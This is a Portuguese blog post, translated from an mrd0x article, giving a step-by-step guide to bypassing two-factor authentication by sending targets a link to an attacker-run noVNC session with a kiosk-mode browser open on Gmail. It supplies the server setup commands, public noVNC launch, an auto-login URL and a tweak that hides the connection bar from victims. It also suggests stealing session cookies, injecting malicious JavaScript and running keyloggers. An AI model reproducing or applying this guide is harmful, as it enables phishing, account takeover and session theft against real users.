Como fazer bypass de qualquer autenticação 2FA

COMPARTILHAR:

Burlar autenticação em dois fatores com VNC

Com noVNC é possível rodar em navegadores modernos tanto em Android e iOS um cliente VNC para acessar remotamente uma máquina qualquer. Com isso em mente, você pode configurar um servidor com noVNC, rodar Firefox (ou qualquer outro navegador) no modo kiosk (modo de acesso limitado) e apontar para o site que você deseja que o usuário se autentique. Assim, basta enviar o link para o usuário alvo e quando o usuário clicar na url, ele na verdade estará acessando sua sessão VNC sem perceber, e como você configurou o navegador em modo kiosk, o usuário verá a página como esperado:


As maneiras pelas quais isso pode ser abusado são infinitas:

  • Ter um JS malicioso injetado no navegador
  • Ter um proxy HTTP conectado ao navegador realizando log de tudo
  • Fechar a sessão VNC quando o usuário se autenticar
  • Pegar o token de sessão do navegador (Botão direito > Inspecionar > Aplicação > Cookies) após o usuário desconectar.
  • Ter um keylogger rodando em background
  • Seja criativo, lembre-se é seu servidor.
Demonstração:

Primeiramente utilize de qualquer cloud service para realizar deploy de uma máquina Linux. O autor dessa façanha utilizou Ubuntu 20.04 .

Depois instale TigerVNC, com os comandos abaixo:
[sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer
sudo apt install ubuntu-gnome-desktop
sudo systemctl enable gdm
sudo systemctl start gdm]

Configure uma senha :

[vncpasswd] 

Você precisará de criar o arquivo abaixo:

[nano ~/.vnc/xstartup] 

Cole dentre do arquivo:

[#!/bin/sh

# Start Gnome 3 Desktop 

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup

[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources

vncconfig -iconic &

dbus-launch --exit-with-session gnome-session &]

Em seguida dê permissões:

[chmod +x ~/.vnc/xstartup]

Agora finalmente, reinicie o VNC server. Note que a sessão VNC usará uma resolução fixa de 2000x1000 , mas não se preocupe pois noVNC auto scaling será demonstrado.

[vncserver -depth 32 -geometry 2000x1000]

Agora baixe e rode noVNC:

[git clone https://github.com/novnc/noVNC.git]

A execução do noVNC é ainda mais fácil. Existem duas opções: executá-lo localmente (para fins de teste) ou publicamente. Ambas as formas são demonstradas abaixo.

[# Running it locally

# Assumes VNC is running on port 5901

# Check port by running vncserver -list

./noVNC/utils/novnc_proxy --vnc localhost:5901


# To access it locally use a SSH tunnel:

ssh -L 6080:127.0.0.1:6080 root@server


# Running it publicly on port 80

ufw allow http

./noVNC/utils/novnc_proxy --vnc 0.0.0.0:5901 --listen 80]

 O comando abaixo serve para rodar o navegador Firefox em modo kiosk:

[firefox --app=https://gmail.com --kiosk]

O parâmetro "password=VNCPASSWORD" na url fará com que o usuário se autentique automaticamente. Mas o noVNC é muito flexível. Se você quiser renomear o parâmetro de consulta, é possível modificar o arquivo vnc_lite.html.

[http://127.0.0.1:6080/vnc_lite.html?password=VNCPASSWORD]

O noVNC exibe uma barra no topo dizendo ‘Connected to XXXXX’. Isso pode ser facilmente removido modificando o arquivo vnc_lite.html. Procure por #top_bar e defina-o como display:none.

Este artigo foi uma tradução livre e resumida do artigo original publicado em https://mrd0x.com/bypass-2fa-using-novnc/ . No artigo o autor explica como rodar múltiplas sessões VNC, afinal você não pode enviar o mesmo link para diferentes usuários já que cada sessão significa uma autenticação de conta específica, além de realizar auto-scaling, desabilitar auto-screen-lock etc.

COMENTÁRIOS

Nome

#ann,24,#HK,28,#LTCode,81,Artigo - Diversos,162,Artigo - Games,197,Artigo - Tecnologia,559,autor-thomaz,7,Coluna - Alternative World,24,Coluna - Fail,12,Coluna - Tec Line,14,Criptomoeda,64,Curiosidades - Diversos,49,Curiosidades - Tecnologia,50,en,2,estudo,6,HN,12,Raspberry Pi,12,root,76,Shorty Awards,1,Smartphones - Reviews,33,Top Nostalgia,2,VPN,17,WhatsApp,45,
ltr
item
Limon Tec: Como fazer bypass de qualquer autenticação 2FA
Como fazer bypass de qualquer autenticação 2FA
Burlar autenticação em dois fatores com VNC
https://blogger.googleusercontent.com/img/a/AVvXsEghhzos8l5X2VMaSz46k144IviuFlsBZ1sas80O4NLYjSG_embKYPPTks9_povxR1oXsRB1hcv7bQ0lyLNqR7s-Oo9smjgG70uR0DcfJC_x_AQjPuUMSSFyFpaT_ospBVYkitTHFysoIWowdXvNadRKmw-i0oyOf2Eto26CJt7zGR03ANbvxFx8FYW3wg=s320
https://blogger.googleusercontent.com/img/a/AVvXsEghhzos8l5X2VMaSz46k144IviuFlsBZ1sas80O4NLYjSG_embKYPPTks9_povxR1oXsRB1hcv7bQ0lyLNqR7s-Oo9smjgG70uR0DcfJC_x_AQjPuUMSSFyFpaT_ospBVYkitTHFysoIWowdXvNadRKmw-i0oyOf2Eto26CJt7zGR03ANbvxFx8FYW3wg=s72-c
Limon Tec
https://www.limontec.com/2022/02/bypass-any-2fa.html
https://www.limontec.com/
https://www.limontec.com/
https://www.limontec.com/2022/02/bypass-any-2fa.html
false
2157924926610706248
UTF-8
Carregar todos posts Não encontramos nenhum post VER TUDO Ler mais Responder Cancelar resposta Deletar Por Home PÁGINAS POSTS Ver tudo RECOMENDADO PARA VOCÊ LABEL ARQUIVO SEARCH TODOS POSTS Não encontramos nenhum post relacionado a sua requisição VOLTAR PÁGINA INICIAL Domingo Segunda Terça Quarta Quinta Sexta Sábado Dom Seg Ter Qua Qui Sex Sab Janeiro Fevereiro Março Abril Maio Junho Julho Agosto Setembro Outubro Novembro Dezembro Jan Fev Mar Abr Maio Jun Jul Ago Set Out Nov Dez apenas agora 1 minuto atrás $$1$$ minutes ago 1 hora atrás $$1$$ hours ago Ontem $$1$$ days ago $$1$$ weeks ago mais de 5 semanas atrás Seguidores Seguir ESTE CONTEÚDO ESTÁ BLOQUEADO PASSO 1: Compartilhe com seus amigos PASSO 2: Clique no link compartilhado Copiar Todo Código Selecionar Todo Código Todos códigos foram copiados para seu clipboard Não é possível copiar códigos / textos, por favor aperte [CTRL]+[C] (ou CMD+C no Mac) para copiar Tabela de conteúdo